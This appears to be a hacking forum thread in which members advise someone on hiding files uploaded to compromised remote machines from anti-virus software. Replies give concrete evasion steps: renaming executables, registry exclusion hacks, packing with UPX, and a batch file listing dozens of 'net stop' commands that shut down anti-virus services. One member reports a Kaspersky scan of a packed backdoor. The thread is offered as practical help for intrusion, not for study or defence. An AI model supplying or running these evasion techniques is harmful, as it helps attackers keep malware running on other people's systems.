[Yosam]

Hi, i remember GSecur posted once how to disable or bypassing an anti-virus
on a remote machine, i tried to search for it but no luck..

anyone knows how can i make the the anti-virus won't alert
about the files i upload in the remote machine?


thanks in advanced.

[Certox]

I just rename the ext. I am guessing ur trying to put up a ftp and iroffer. And lots of anti-virus will delete it, so just name it iroffer.ex and servu.ex the modify ur bat to read them, if you can get ur ftp up reg just do that, and if you are haveing problems getting ur bat to start the bot just do : site exec iroffer.ex -b xdcc.config
It will start right up :)
Of course I dont mean for you to do anything illegal, so when trying to bypass your own anit-virus on your own computer, do that :P

[Jeeve5]

Hi

The way I usually do it is:
1. stop the AV service
2. upload a registry hack that tells the AV to exclude all files in the dir you up your kit to
3. regedit /s patch.reg
4. restart the AV service

Usually works. Only excpetion I found is OfficeScan NT. Thing to do there is modify the exclude filenames to you yourprog1.exe and yourprog2.exe

Hope that helped,
Jeeve5

[Imps2]

Use a packer and rename u'r file or kill the AV ;)

net stop Mcshield
net stop "Norton Antivirus Service"
net stop "Panda Antivirus"
net stop "ZoneAlarm"
net stop "Detector de OfficeScanNT"
net stop "McAfee Framework Service"


Greetz Imps2

[Yosam]

What is a packer exactly?
what what file are you talking about?

can i just put this "code" that u gave me into a bat file
and run it on the machine?

[Jeeve5]

The most common packer is UPX.

The 'code' he just gave you is to stop the AV services. Problem is that Norton usually recognizes packed files and therefore it is useless.

[Yosam]

ok but i didn't understand your method.

what is a registry hack?
where can i find it?

[Imps2]

A packer changes the size of u'r proggie and renames it so it's harder to detect by AV software.

You should be able to run the commands from a bat file

Greetz Imps2

[miezmiez]

link to test your files online:

http://www.kaspersky...teviruschk.html

and the results are horrible:

Zu �berpr�fende Datei: server_.exe

server_.exe Komprimiert: ASPack
server_.exe Komprimiert: ASPack
server_.exe Komprimiert: Morphine
server_.exe Komprimiert: UPX
server_.exe Infiziert: Backdoor.Winshell.50

kaspersky know all known exe packers and has the depacker i think ...

does anybody has an unknown packer ???

[Reaper527]

put the following code into av.bat

@echo off
net stop AVP32
net stop LOCKDOWN2000
net stop AVP.EXE
net stop CFINET32
net stop CFINET
net stop ICMON
net stop SAFEWEB
net stop WEBSCANX
net stop ANTIVIR
net stop MCAFEE
net stop NORTON
net stop NVC95
net stop FP-WIN
net stop IOMON98
net stop PCCWIN98
net stop F-PROT95
net stop F-STOPW
net stop PVIEW95
net stop NAVWNT
net stop NAVRUNR
net stop NAVLU32
net stop NAVAPSVC
net stop NISUM
net stop SYMPROXYSVC
net stop RESCUE32
net stop NISSERV
net stop ATRACK
net stop IAMAPP
net stop LUCOMSERVER
net stop LUALL
net stop NMAIN
net stop NAVW32
net stop NAVAPW32
net stop VSSTAT
net stop VSHWIN32
net stop AVSYNMGR
net stop AVCONSOL
net stop WEBTRAP
net stop POP3TRAP
net stop PCCMAIN
net stop PCCIOMON

its a list i got from a friend, basically just put that bat file on their comp and run it and it will attempt to stop a whole bunch of differant av's, odds are whatever they use is on that list somewhere.

[Trojan^kid]

packers is agood choise to by pass norton and other antivirus
McAfee and ksv ithink hex edite is the only one :)
cheers

[--Elite--]

Your complete answer.

Seems the members completed my post enough , to help ... :)

[globe7]

i love the esy way:
look at the service list
and stop the anti virus (:

[bjoernfun]

Heya,

@Jeeve5 can you post the registry hack, so the AV will exclude the directory!


thanks